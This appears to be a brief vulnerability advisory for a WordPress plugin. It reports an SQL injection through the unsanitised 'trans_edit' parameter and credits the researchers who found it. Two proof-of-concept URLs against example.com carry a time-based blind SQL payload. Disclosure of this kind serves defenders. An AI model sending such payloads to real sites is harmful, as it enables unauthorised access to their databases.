The plugin does not sanitise and escape the trans_edit parameter before using it in a SQL statement when an agent edit a transaction, leading to an SQL injection
As a logged in agent: https://example.com/workstation/?transactions=open_transactions&trans_edit=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b) https://example.com/workstation/?transactions= open_agent_transactions&trans_edit=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Daniel Krohmer
Yes
2022-05-09 (about 1 years ago)
2022-05-12 (about 1 years ago)
2022-06-21 (about 1 years ago)